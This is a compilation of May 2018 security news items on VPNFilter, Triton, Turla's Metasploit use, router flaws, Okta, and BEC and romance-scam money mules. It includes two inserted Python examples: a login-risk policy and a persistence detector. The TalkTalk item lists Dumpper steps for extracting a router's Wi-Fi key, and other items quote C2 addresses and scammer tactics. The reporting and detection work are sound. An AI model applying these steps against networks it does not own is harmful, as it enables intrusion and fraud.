This is a primary method, along with work-from-home scams, used to recruit the money mules needed to get money out of the country (asking Finance to wire money direct to Nigeria or China or the Philippines would probably fail at the first hurdle). "Recruiting money mules is a full-time effort for each of the groups we captured. As the scammer groups are typically based overseas, a successful scamming operation is entirely dependent on money transfer techniques that evade suspicion."

Typically, a romance scam works by first making contact through a dating website. As soon as possible, the conversation is moved to a separate communications channel, and the scammer starts to ask for small sums of money to help with some contrived hardship. "Once the victim starts complaining about money, offer them a way to get all of their money back by simply cashing a couple of checks and sending part of the money to the scammer via MoneyGram or Western Union."

Once this happens, the romance victim becomes susceptible to blackmail and a money mule (or money launderer) has been recruited. Money scammed from other victims is not wired directly abroad, but wired to the local mule's bank account, and from there on to its overseas destination.

The details of such scams -- and many more categories are discussed in the Agari report -- are already well-understood. What is new, however, is Agari's ability to monitor the captured criminal email accounts over time and see the scam unfolding; both the scammers' requests and the victims' replies.

On several occasions Agari was able to step in and warn the victim. In November 2017, for example, it warned 5 real estate firms that their email had been compromised. In April 2018, "an Agari researcher identified [a] BEC attack and was able to warn the accounts payable team just in time to reverse the wire payment. The response from the victim was a condemnation of the attacker using words too colorful to print."

The Agari project is an example of the growing determination of cyber defenders to stop being purely reactive to threats and to take the initiative against attackers. It is a good example of the potential of active defense: not only was Agari able to disrupt criminal activity, but capturing the criminals' email accounts enabled it to identify many of the individual criminals.

"In close partnership with law enforcement, our customers and our partners," says the report, "Agari will continue to capture and report identity-based attacks and help turn the tide of online crime."

Agari raised $22 million Series D funding in May 2016, bringing the total raised by the company to $44.7 million.


Okta Adds Threat Intel to Network Context to Eliminate Passwords
24.5.2018 securityweek  Safety

Okta Unveils Adaptive Single Sign-On and Enhanced Adaptive Multi-Factor Authentication Products

The adequacy of passwords as a security defense has long been discussed and criticized. The 2017 Verizon Data Breach Investigation Report (DBIR) reported that 81% of hacking-related breaches involve stolen or compromised user credentials -- and yet there is no generally accepted alternative. Multi-factor user authentication -- which requires an additional user token or biometric -- helps, but does not solve the problem.

With traditional approaches there is a simple contradiction: the more security that is applied to user authentication, the greater the disruption (known as 'friction') imposed on user workflows. When companies strive for a seamless user experience, for both their customers and their workforce, this is a problem. "For companies trying to deliver seamless and secure user-experiences, passwords are a real pain," explained Joe Diamond, director of security product marketing management at Okta, in a blog post. "Either they're complex -- and therefore difficult for employees and customers to remember -- or they're prime targets for nefarious hackers."

In recent years there has been a growing development and acceptance of additional passive authentication factors to improve security without disrupting the user. Passive in this sense simply means that the authentication is automatically taken without user involvement.

One of the most important passive factors is context, and identity companies are increasingly incorporating contextual factors such as user location (IP address), time (is it reasonable for this user to want access at this time?), and destination (does this user likely or commonly need access to these files?) to bolster the initial password authentication. But notice the much-decried password is still necessary.

Okta, which provides identity systems for corporations, has a device trust model to enhance the security of remote logins. It uses, for example, Exchange ActiveSync certificates to prevent unmanaged devices from accessing Office 365. Today, however, it has announced the addition of a new context factor that it believes will largely enable the elimination of passwords: ThreatInsight.

ThreatInsight is based on the understanding of threats and suspicious activity seen by Okta's incident response team across the company's ecosphere of 4,350 customers and 5,500 partners in the Okta Integration Network.

"By blending context signals with this intelligence," writes Diamond, "Okta's Adaptive MFA solution will be able to more effectively provide businesses with the seamless, simple authentication experience that companies have grown to depend on. We've also introduced Adaptive Single Sign-on (SSO), which provides a simple, secure authentication experience for users and integrates with third-party enterprise mobility management solutions, such as Airwatch or MobileIron, for device trust. With this combination of Adaptive SSO, MFA, and ThreatInsight, IT and app development teams can move toward a context-driven security approach -- one that may eventually eliminate passwords after all."

"The best password is no password at all," adds Todd McKinnon, CEO and co-founder of Okta. "Over the past few years, we've invested heavily in new security technologies that provide the right level of protection for the many apps and services an organization uses today, which can vary by company, by app, by user, and by scenario. Now we're using both those signals across a user's login context as well as insight from across our ecosystem to improve an organization's ability to set stronger access controls and make faster, more intelligent decisions when there may be a concern -- and allow companies to replace the password with stronger, simpler authentication."

By combining all the different contextual factors, the Okta Adaptive MFA product is able to make dynamic access decisions. It can distinguish between low-risk and high-risk access requests, and only require traditional authentication measures such as a password if the risk level calls for it.

For example, a user attempting authentication from a recognized IP address on a known managed device could be considered low risk and allowed access without the necessity for a password.

If the authentication request comes from a known but unmanaged device in a new location, it could be considered moderate risk. The user would be prompted with a security question and asked to present a second factor.

If the user attempts to authenticate from an unmanaged and unknown device over a connection with a high threat level, the user would be considered 'high risk' and Okta would disallow access.
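The three risk tiers described above, encoded as a small policy function. This is an added illustration, not Okta's code; the context field names and the "low"/"medium"/"high" threat-level scale are assumptions, and requiring a low threat level for the password-less path is a tightening the article does not spell out.

```python
"""Added example (not Okta's code): a toy adaptive-access policy encoding the
three risk tiers the article describes. Field names and the threat-level scale
are assumptions for illustration."""
from dataclasses import dataclass
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"        # no password prompt
    STEP_UP = "step_up"    # security question plus a second factor
    DENY = "deny"


@dataclass(frozen=True)
class LoginContext:
    ip_recognized: bool    # source IP previously seen for this user
    device_known: bool     # device fingerprint previously seen
    device_managed: bool   # enrolled in MDM / holds a device-trust certificate
    new_location: bool     # geolocation differs from the user's history
    ip_threat_level: str   # "low" | "medium" | "high" (assumed threat-intel scale)


def assess_risk(ctx: LoginContext) -> str:
    """Map context signals to a risk tier: "low", "moderate" or "high"."""
    if ctx.ip_threat_level not in ("low", "medium", "high"):
        raise ValueError(f"unknown threat level: {ctx.ip_threat_level!r}")
    # High: unknown, unmanaged device arriving over a high-threat connection.
    if (not ctx.device_known and not ctx.device_managed
            and ctx.ip_threat_level == "high"):
        return "high"
    # Low: recognized IP on a known, managed device. The threat-level check is
    # an assumption: intel signals should be able to veto the password-less path.
    if (ctx.ip_recognized and ctx.device_known and ctx.device_managed
            and ctx.ip_threat_level == "low"):
        return "low"
    # Everything else (e.g. a known but unmanaged device in a new location)
    # is moderate: the policy fails toward more friction, not less.
    return "moderate"


def decide(ctx: LoginContext) -> Decision:
    """Turn the risk tier into an access decision."""
    tier = assess_risk(ctx)
    if tier == "low":
        return Decision.ALLOW
    if tier == "moderate":
        return Decision.STEP_UP
    return Decision.DENY


if __name__ == "__main__":
    # Constructed sample contexts mirroring the article's three scenarios.
    for ctx in (
        LoginContext(True, True, True, False, "low"),
        LoginContext(False, True, False, True, "low"),
        LoginContext(False, False, False, True, "high"),
    ):
        print(assess_risk(ctx), decide(ctx).value)
```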

Banks provide an example of the problem with password authentication. Banks by their nature require strong authentication, which is not provided by passwords alone. But they also require user-friendly authentication (for fear of losing customers), which is not provided by standard multi-factor solutions. The National Bank of Canada believes it has found the right compromise with Okta.

"National Bank of Canada services millions of clients in hundreds of branches across Canada. As an organization, we have clear objectives, one of which is to simplify the customer experience," said Alain Goffi, vice president, IT Infrastructures at National Bank of Canada. "Okta's smart authentication and contextual capabilities enable us to give our clients a seamless, secure online experience."

Okta's ThreatInsight is scheduled to be available during the second half of this year.


GRIMM Opens Security Research Lab for ICS, Connected Vehicles
24.5.2018 securityweek  ICS

Cybersecurity research and engineering firm GRIMM has opened a new Grand Rapids, MI-based cybersecurity research lab. GRIMM provides security consulting, engineering and research services, including vulnerability research/testing and security training, to both government agencies and private sector enterprises.

The new lab will enable the company to work closely on cybersecurity initiatives within the advanced manufacturing, aerospace, automobility and defense industries based in the region; and in particular it is designed to engage with companies in the automotive and aviation industries, including OEMs. It will major on the embedded (IoT) devices integral to the industrial control systems of these industries.

"Practically every new vehicle has connected or autonomous components and smart city technologies are being deployed into urban infrastructure on a regular basis. The realities of the Internet of Everything means that distributed systems, from industrial control systems to aerospace manufacturing operations and everything in between, must have security measures embedded or run the risk of exposing countless enterprises, systems and users to vulnerabilities," said Brian DeMuth, GRIMM CEO. "GRIMM's Michigan lab will enable our team of researchers and security experts to become more deeply embedded into the critical industries -- automobility, aerospace, defense and manufacturing -- that support these advanced technologies."

Connected cars are a case in point. "By 2020, there will be a quarter billion connected vehicles on the road, enabling new in-vehicle services and automated driving capabilities, according to Gartner, Inc. During the next five years, the proportion of new vehicles equipped with this capability will increase dramatically, making connected cars a major element of the Internet of Things (IoT)." (Gartner) By 2020, one in five vehicles on the road worldwide will have some form of wireless network connection.

But the rush to connectivity is introducing serious security concerns. GRIMM's new cybersecurity research facility will focus on embedded systems engineering to support its current car hacking initiatives and cyber research in the automobility and aerospace sectors. In the last month automobile vulnerabilities have included a bug in a misconfigured server run by Calamp that would allow attackers to track the vehicle's locations, steal user information, and even cut the engine.

Earlier this month it was announced that some Volkswagen vehicles could be remotely hacked by an undisclosed vulnerability that would enable attackers to control the on-board microphone to listen in on the driver and passengers, access the system's address book and history while introducing the possibility of tracking the car via its navigation system.

Just yesterday, it was announced that Chinese researchers from Keen Security Lab had discovered more than a dozen locally and remotely exploitable flaws in certain BMW cars.

"Yesterday's disclosure that a number of BMW vehicles are susceptible to a range of cyber vulnerabilities highlights that as we continue to add more connected and autonomous capabilities into vehicles, the surface area to secure becomes exponentially larger," Bryson Bort, GRIMM chairman and founder told SecurityWeek. "This is precisely why GRIMM is announcing the opening of its dedicated cybersecurity lab in Michigan where it will work closely on initiatives within the advanced manufacturing, auto and defense industries based in the region. It will enable GRIMM to work more closely with original equipment manufacturers, suppliers, and other stakeholders in the automobility sector and beyond to improve the holistic security of automotive, aviation, and industrial control systems to address the challenges of cybersecurity in these fields."


U.S. Disrupts Russian Botnet of 500,000 Hacked Routers
24.5.2018 securityweek  BotNet

The US Justice Department said Wednesday that it had seized an internet domain that directed a dangerous botnet of a half-million infected home and office network routers, controlled by hackers believed tied to Russian intelligence.

The move was aimed at breaking up an operation deeply embedded in small and medium-sized computer networks that could allow the hackers to take control of computers as well as easily steal data.

The Justice Department said the "VPNFilter" botnet was set up by a hacking group variously called APT28, Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group.

The group is blamed for cyber attacks on numerous governments, key infrastructure industries like power grids, the Organization for Security and Co-operation in Europe, the World Anti-Doping Agency, and other bodies.

US intelligence agencies also say it was involved in the operation to hack and release damaging information on the Democratic Party during the 2016 US presidential election, and has engineered a number of computer network disruptions in Ukraine.

"According to cybersecurity researchers, the Sofacy Group is a cyber-espionage group believed to have originated from Russia," the Department of Justice said in a court filing.

"Likely operating since 2007, the group is known to typically target government, military, security organizations, and other targets of intelligence value, through a variety of means," it said.

The Justice filing did not say who was behind Sofacy Group, but US intelligence has in the past linked it to Russia's GRU military intelligence agency, and numerous private computer security groups have made the same connection.

In Wednesday's action, the Justice Department said it had obtained a warrant authorizing the FBI to seize a computer domain that is part of the command and control system of the VPNFilter botnet.

The botnet targets home and office routers, through which it can relay orders from the botnet's controllers and intercept and reroute traffic back to them, virtually undetected by the users of a network.

In a report released in parallel to the Justice announcement, network equipment giant Cisco said VPNFilter had infected at least 500,000 devices in at least 54 countries.

It has targeted popular router brands like Linksys, MikroTik, NETGEAR and TP-Link.

"The behavior of this malware on networking equipment is particularly concerning, as components of the VPNFilter malware allows for theft of website credentials," Cisco said.

It also has "a destructive capacity that can render an infected device unusable, which can be triggered on individual victim machines or en masse."

Both Justice and Cisco said they were releasing details of the problem before having found a strong, permanent fix. Justice said that by seizing control of one of the domains involved in running VPNFilter, it will give owners of infected routers a chance to reboot them, forcing them to begin communicating with the now-neutralized command domain.

The vulnerability will remain, Justice said, but the move will allow them more time to identify and intervene in other parts of the network.


Hackers Behind 'Triton' Malware Attack Expand Targets
24.5.2018 securityweek  Virus

The threat group responsible for the recently uncovered attack involving a piece of malware known as Triton, Trisis and HatMan is still active, targeting organizations worldwide and safety systems other than Schneider Electric’s Triconex.

The actor, which industrial cybersecurity firm Dragos tracks as Xenotime, is believed to have been around since at least 2014, but its activities were only discovered in 2017 after it targeted a critical infrastructure organization in the Middle East.

The attack that led to the cybersecurity industry uncovering Xenotime was reportedly aimed at an oil and gas plant in Saudi Arabia. It specifically targeted Schneider Electric’s Triconex safety instrumented systems (SIS) through a zero-day vulnerability.

The targeted organization launched an investigation and called in third-party experts, including Dragos and FireEye, after the SIS caused some industrial systems to unexpectedly shut down. Researchers believe the shutdown was caused by the attackers by accident.

Dragos continues to analyze the initial Triton/Trisis incident and more recent attacks launched by Xenotime. The company says the group has targeted organizations globally, far outside the Middle East.

The security firm has not shared any details on present attacks, but it did note that the hackers are active in multiple facilities, targeting safety controllers other than Triconex.


Some researchers believe Iran is behind the attacks, but Dragos has not shared any information on attribution. The company did point out that it has not found any links between Xenotime and other known groups.

“Dragos assesses with moderate confidence that Xenotime intends to establish required access and capability to cause a potential future disruptive or even destructive event,” the company wrote in a blog post. “Compromising safety systems provides little value outside of disrupting operations. The group created a custom malware framework and tailormade credential gathering tools, but an apparent misconfiguration prevented the attack from executing properly. As Xenotime matures, it is less likely that the group will make this mistake in the future.”

Dragos has been tracking the activities of several threat actors that target industrial control systems (ICS). The company has published brief reports for three of the seven hacker groups it monitors, including the Russia-linked Allanite, which targets electric utilities in the US and UK, and Iran-linked Chrysene, which has attacked ICS networks in the Middle East and the UK.


Malwarebytes Acquires Binisoft to Enhance Endpoint Protection Platform
24.5.2018 securityweek  Safety

Malwarebytes announced this week the acquisition of Binisoft in an effort to help the company enhance its endpoint protection platform and expand its global footprint. Terms of the deal have not been disclosed.

Romania-based Binisoft is the brainchild of Alexandru Dicu, who in 2010 decided to create Windows Firewall Control, a tool designed to make it easier to manage the firewall built into Windows.

Over the past years, Windows Firewall Control has become a powerful and highly popular tool used by millions of people. It allows users to quickly access frequently needed options of the Windows Firewall.

Binisoft has also developed USB Flash Drives Control, a small and powerful utility designed for controlling how USB removable drives are used on a device. For example, users can prevent read and write operations, or they can block any executable file on a flash drive from running.

Malwarebytes plans on integrating Windows Firewall Control into its endpoint protection platform, which provides broad visibility into endpoints on a network and simplifies the deployment and management of security solutions.

“We’ve seen tremendous demand from our customer base for these capabilities,” said Marcin Kleczynski, CEO of Malwarebytes. “With continued increases in cyberthreats, including malware that communicates and coordinates data theft, it is more important than ever for businesses to easily manage their Windows Firewall and establish communication policies to prevent programs from initiating unauthorized outbound connections. With the acquisition of Binisoft, Malwarebytes will provide an all in one solution well beyond having to manage a Firewall through Group Policy Objects or other Microsoft technologies.”

Windows Firewall Control has been distributed under a donationware licensing model, while USB Flash Drives Control has been offered as freeware. Malwarebytes has promised to continue maintaining and supporting Binisoft products, and offer them for free, at least in the short term.


Xenotime, Threat actors Behind Triton Malware broadens its activities
24.5.2018 securityaffairs  Virus

The threat actor behind the Triton malware (aka Trisis, Xenotime, and HatMan) is now targeting organizations worldwide and safety systems.
The attackers are expanding their targets, and new variants are able to attack systems other than Schneider Electric’s Triconex.

The malware was first spotted in December 2017 by researchers at FireEye, who discovered that it was specifically designed to target industrial control systems (ICS).

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.


The Triton malware is designed to target Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers that are used in industrial environments to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially hazardous situation.

TRITON is designed to communicate using the proprietary TriStation protocol, which is not publicly documented; this implies that the attackers reverse engineered the protocol to carry out the attack.

According to experts at Dragos, the threat actors have been around since at least 2014; they were discovered in 2017 after they caused a shutdown at a critical infrastructure organization in Saudi Arabia.

Dragos researchers warn of new cyber attacks powered by the same group against organizations globally.

“Dragos assesses with moderate confidence that Xenotime intends to establish required access and capability to cause a potential future disruptive or even destructive event,” states Dragos Security. “Compromising safety systems provides little value outside of disrupting operations. The group created a custom malware framework and tailormade credential gathering tools, but an apparent misconfiguration prevented the attack from executing properly. As Xenotime matures, it is less likely that the group will make this mistake in the future.”

Experts at Dragos have published a collection of reports on threat groups targeting critical infrastructure; the first one covered the activities of the Russia-linked Allanite group.

Summary information on threat actors will be made available through an Activity Groups dashboard, but users interested in the full technical report need to pay for it.


Experts warn: it is too easy to steal WiFi access key from TalkTalk ‘s Super Routers
24.5.2018 securityaffairs Hacking

Home Wi-Fi networks in the UK using the Super Router provided by the ISP TalkTalk are affected by a vulnerability that exposes them to cyber attacks.
Security researchers at software house IndigoFuzz have discovered a security flaw in the implementation of the WPS feature of the TalkTalk Super Router that can be exploited to steal the gateway’s wireless network password and take over the network.

Experts reported the issue to TalkTalk back in 2014, but the vulnerability is still present.

The routers implement a WPS pairing option that is turned on by default, and due to the known security issues affecting the WPS protocol, an attacker within range can easily extract the Wi-Fi password of the device using hacking tools available online.

“The vulnerability discovered allows the attacker to discover the Super Router’s WiFi Password by attacking the WPS feature in the router which is always switched on, even if the WPS pairing button is not used.” reads the blog post published by Indigofuzz.

According to IndigoFuzz’s advisory on Monday, the routers provide a WPS pairing option that is always turned on. Because that WPS connection is insecure, an attacker within range can exploit it using readily available hacking tools (i.e. Software ‘Dumpper’ available on Sourceforge (Tested with v.91.2)), and thus extract the router’s Wi-Fi password.

Attackers just need to be within range of a TalkTalk Super Router, then probe it through the insecure WPS feature to obtain the gateway’s Wi-Fi password.

Below is the procedure described by the experts to compromise a network using the TalkTalk Super Router and obtain the WiFi access key.

Step 1: Run Dumpper and navigate to the WPS tab and select the target WiFi BSSID.
Step 2: Click ‘WpsWin’ to begin probing the BSSID for the WPS pin.
Step 3: After a couple of seconds, the WiFi access key to this network will be displayed bottom right.

The experts explained that this attack is scalable to a broad range of TalkTalk Super Routers.

“This method has proven successful on multiple TalkTalk Super Routers belonging to consenting parties which is enough to suggest that this vulnerability affects all TalkTalk Super Routers of this particular model/version,” concluded the IndigoFuzz experts.

“TalkTalk have been notified of this vulnerability in the past and have failed to patch it many years later.”

Below is the timeline shared by the experts:

21 May 2018 Delivered to TalkTalk.
21 May 2018 Date of public release.
IndigoFuzz decided to publicly disclose the issue immediately because TalkTalk hasn’t taken any action since its first reports in 2014.

“The purpose of this article is to encourage TalkTalk to immediately patch this vulnerability in order to protect their customers,” concluded the experts.


Turla APT group leverages for the first time the Metasploit framework for the Mosquito campaign
24.5.2018 securityaffairs APT

Security experts from ESET observed the Turla APT group leveraging the Metasploit framework for the first time in the Mosquito campaign.
The Russia-linked Turla APT group continues its cyber espionage campaigns shifting towards more generic tools to remain under the radar.
Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.

The list of victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using …

In the most recent attacks, the group is packaging its macOS backdoor with a real Adobe Flash installer and downloading the malware onto victim systems from a remote IP belonging to Akamai, the Content Delivery Network that is also used by Adobe for its distribution. Legitimate Flash installers, in fact, are also distributed through the Akamai network.

In January, experts observed the APT group employing an Adobe Flash installer and an ingenious social engineering technique to deliver a backdoor served from what appear to be legitimate Adobe URLs and IP addresses.

Starting in March 2018, the experts from ESET observed a significant change in the campaign: the hackers are leveraging the popular open source exploitation framework Metasploit in a campaign that spreads the Mosquito backdoor.
This is the first time Turla has used Metasploit as a first-stage backdoor, instead of relying on one of its own tools such as Skipper.
The Mosquito campaign still leverages a fake Flash installer that hides the Turla backdoor.

When victims download the Flash installer from get.adobe.com over HTTP, attackers intercept the traffic to serve a tainted version of the legitimate Flash executable.


“At the beginning of March 2018, as part of our regular tracking of Turla’s activities, we observed some changes in the Mosquito campaign.” reads the report published by ESET.

“Recently, we observed a change in the way in which the final backdoor is dropped. Turla’s campaign still relies on a fake Flash installer but, instead of directly dropping the two malicious DLLs, it executes a Metasploit shellcode and drops, or downloads from Google Drive, a legitimate Flash installer.” the report continues. “Then, the shellcode downloads a Meterpreter, which is a typical Metasploit payload [6], allowing the attacker to control the compromised machine. Finally, the machine may receive the typical Mosquito backdoor.”


Attackers control the exploitation process manually through the Metasploit framework, and the overall time frame of the attack is relatively short. According to ESET, the attackers are able to deliver the final backdoor in just thirty minutes.

“The shellcode is a typical Metasploit shellcode, protected using the shikata_ga_nai encoder [7] with seven iterations. Once the shellcode is decoded, it contacts its C&C at https://209.239.115[.]91/6OHEJ, which directs the download of an additional shellcode.” continues the report.

“Based on our telemetry, we identified the next stage to be a Meterpreter. That IP address is already known as a previously seen Mosquito C&C domain, psychology-blog.ezua[.]com, was resolving to it in October 2017. Finally, the fake Flash installer downloads a legitimate Adobe installer, from a Google Drive URL, and executes it to lull the user into thinking all went correctly.”

Experts noticed that in addition to the new fake Flash installer and Meterpreter, the hackers used many other tools, including:

A custom executable that only contains the Metasploit shellcode. This is used to maintain access to a Meterpreter session. It is saved to C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msupdateconf.exe, granting the executable persistence.
Another custom executable used to execute PowerShell scripts.
The Mosquito JScript backdoor that uses Google Apps Script as its C&C server.
Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8].
Further details, including IoCs, are included in the report.
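The persistence artifact listed above (an executable dropped into a per-user Startup folder) is something a defender can hunt for in file-creation telemetry. The following detection is an added example, not ESET's code; the pipe-separated event format and the sample events are constructed for illustration, and only the Startup path and the msupdateconf.exe file name come from the report.

```python
"""Added example (not from the ESET report): flag file-creation events that
place an executable in a per-user Startup folder, the persistence technique
the Mosquito campaign used. Event format and sample lines are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Per-user Startup folder, as in the path the report gives (username varies).
STARTUP_RE = re.compile(
    r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Roaming\\Microsoft\\Windows\\"
    r"Start Menu\\Programs\\Startup\\([^\\]+)$",
    re.IGNORECASE,
)
# File name reported for the campaign; an exact match is a high-confidence hit.
KNOWN_IOC_NAMES = {"msupdateconf.exe"}
# Any of these extensions in a Startup folder merits a look; .lnk shortcuts are
# routine there and are deliberately not flagged.
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1")


@dataclass
class Finding:
    timestamp: str
    process: str     # process that created the file
    path: str
    severity: str    # "high" for the known IoC name, "medium" otherwise


def parse_event(line: str) -> Optional[Tuple[str, str, str]]:
    """Parse one constructed file-create event: timestamp|process|target_path."""
    parts = line.rstrip("\n").split("|", 2)
    if len(parts) != 3:
        return None
    ts, proc, path = (p.strip() for p in parts)
    return ts, proc, path


def check_startup_persistence(lines: List[str]) -> List[Finding]:
    """Return one Finding per executable written into a user Startup folder."""
    findings: List[Finding] = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue  # malformed telemetry line; skip rather than crash
        ts, proc, path = event
        match = STARTUP_RE.match(path)
        if match is None:
            continue
        name = match.group(1).lower()
        if not name.endswith(EXECUTABLE_EXT):
            continue
        severity = "high" if name in KNOWN_IOC_NAMES else "medium"
        findings.append(Finding(ts, proc, path, severity))
    return findings


# Constructed sample telemetry (not real data): a drop matching the reported
# IoC, a benign shortcut, an unknown executable, an unrelated write, junk.
SAMPLE_EVENTS = [
    "2018-03-02T10:15:01Z|flashplayer_install.exe|C:\\Users\\alice\\AppData\\Roaming"
    "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe",
    "2018-03-02T10:15:03Z|explorer.exe|C:\\Users\\alice\\AppData\\Roaming"
    "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OneDrive.lnk",
    "2018-03-02T10:16:10Z|installer.exe|C:\\Users\\bob\\AppData\\Roaming"
    "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\helper.exe",
    "2018-03-02T10:17:00Z|notepad.exe|C:\\Users\\bob\\Documents\\notes.txt",
    "malformed line",
]

if __name__ == "__main__":
    for f in check_startup_persistence(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.timestamp} {f.process} -> {f.path}")
```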


Huge Russia-Linked botnet VPNFilter ready to launch a massive attack on Ukraine
24.5.2018 securityaffairs BotNet

Security firm Talos along with other cybersecurity firms and law enforcement agencies have uncovered a huge botnet dubbed VPNFilter, composed of more than 500,000 compromised routers and network-attached storage (NAS) devices.
The experts believe VPNFilter was developed by Russia and the associated malware appears to be very sophisticated; at the time of discovery they had identified more than 500,000 compromised devices across 54 countries.

“For several months, Talos has been working with public- and private-sector threat intelligence partners and law enforcement in researching an advanced, likely state-sponsored or state-affiliated actor’s widespread use of a sophisticated modular malware system we call ‘VPNFilter.’” reads the blog post published by Talos.

“We have not completed our research, but recent events have convinced us that the correct way forward is to now share our findings so that affected parties can take the appropriate action to defend themselves.”

Even if the experts are still investigating the botnet, they decided to publish an initial report fearing an imminent massive attack powered by VPNFilter.

Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.

Many infected devices have been discovered in Ukraine and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity, with most infections in Ukraine; the majority of the compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

At the time of writing, the experts haven’t yet identified the attack vector.

VPNFilter is a multi-stage, modular strain of malware with a wide range of capabilities for both cyber espionage and sabotage purposes.

“As of this writing, we are aware of two plugin modules: a packet sniffer for collecting traffic that passes through the device, including theft of website credentials and monitoring of Modbus SCADA protocols, and a communications module that allows stage 2 to communicate over Tor.” continues the report.

“We assess with high confidence that several other plugin modules exist, but we have yet to discover them.”


Experts are particularly concerned by the destructive features implemented by the malware, which could allow attackers to brick users’ devices to cover their tracks.

Experts believe that the attack could be launched by the threat actors during the Ukrainian celebration of Constitution Day; last year the NotPetya wiper attack was launched in the same period.

“VPNFilter is an expansive, robust, highly capable, and dangerous threat that targets devices that are challenging to defend. Its highly modular framework allows for rapid changes to the actor’s operational infrastructure, serving their goals of misattribution, intelligence collection, and finding a platform to conduct attacks,” Talos concluded.


Kaspersky discovered a backdoor account and other issues in D-Link DIR-620 Routers
24.5.2018 securityaffairs  Vulnerebility

Security experts from Kaspersky have discovered a backdoor account and three other vulnerabilities in D-Link DIR-620 routers.
Security researchers from Kaspersky Lab have uncovered a backdoor account (CVE-2018-6213) in the firmware of D-Link DIR-620 routers that could be exploited by attackers to access the device’s web panel and take over devices exposed online.

“The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords.” reads the blog post published by Kaspersky.

“The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).”

To prevent abuse, the experts did not disclose the credentials for the backdoor account.


The bad news is that it is impossible to disable the backdoor account; the only way to mitigate the issue is to avoid exposing the admin panel online.

The firmware version containing the backdoor account is 1.0.37.

Kaspersky researchers have discovered three other vulnerabilities in the firmware of the D-Link DIR-620 routers. The remaining issues are:

CVE-2018-6210 – Hardcoded default credentials for Telnet.
CVE-2018-6211 – OS command injection
CVE-2018-6212 – Weakness in user data validation (reflected cross-site scripting)
Fortunately, there aren’t many D-Link DIR-620 devices exposed online because it is an old model.

The flawed devices were distributed by ISPs in Russia, the CIS, and Eastern Europe (most of them in Russia); Kaspersky has already reported the flaws to the ISPs.


D-Link was notified of the vulnerabilities but said it will not issue firmware updates to address them.

To mitigate the issues Kaspersky recommends:

Restrict any access to the web dashboard using a whitelist of trusted IPs
Restrict any access to Telnet
Regularly change your router admin username and password


Justice Department announces actions to disrupt the VPNFilter botnet
24.5.2018 securityaffairs APT  Virus

The Justice Department announced an effort to disrupt the VPNFilter botnet of hundreds of thousands of infected home and office (SOHO) routers and other networked devices under the control of a Russia-linked APT group.
Yesterday Talos and other security firms revealed the discovery of a huge botnet tracked as VPNFilter, composed of more than 500,000 compromised routers and network-attached storage (NAS) devices; now more details have emerged on the case.

The experts believe VPNFilter was developed by Russia; the associated malware compromised devices across 54 countries, most of them in Ukraine.

On May 8, Talos researchers observed a spike in VPNFilter infection activity, with most infections in Ukraine; the majority of the compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

The US Justice Department announced it had seized a domain used as part of the command and control infrastructure; it explicitly refers to the Russian APT groups (APT28, Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group) as the operators behind the huge botnet.

“The Justice Department today announced an effort to disrupt a global botnet of hundreds of thousands of infected home and office (SOHO) routers and other networked devices under the control of a group of actors known as the “Sofacy Group” (also known as “apt28,” “sandworm,” “x-agent,” “pawn storm,” “fancy bear” and “sednit”).” reads the press release published by the DoJ.

“Today’s announcement highlights the FBI’s ability to take swift action in the fight against cybercrime and our commitment to protecting the American people and their devices,” said Assistant Director Scott Smith. “By seizing a domain used by malicious cyber actors in their botnet campaign, the FBI has taken a critical step in minimizing the impact of the malware attack. While this is an important first step, the FBI’s work is not done. The FBI, along with our domestic and international partners, will continue our efforts to identify and expose those responsible for this wave of malware.”

The VPNFilter botnet targets SOHO routers and network-attached storage (NAS) devices and uses several stages of malware. The experts highlighted that the second-stage malware, which implements the malicious capabilities, can be cleared from a device by rebooting it, while the first-stage malware implements a persistence mechanism.

The Justice Department had obtained a warrant authorizing the FBI to seize the domain that is part of the command and control infrastructure of the VPNFilter botnet.

Technically, the operation conducted by the US authorities is called “sinkholing”; the seizure of the domain allows law enforcement and security experts to analyze the traffic associated with the botnet, gather further information on the threat and temporarily neutralize it.

“In order to identify infected devices and facilitate their remediation, the U.S. Attorney’s Office for the Western District of Pennsylvania applied for and obtained court orders, authorizing the FBI to seize a domain that is part of the malware’s command-and-control infrastructure.” continues the DoJ.

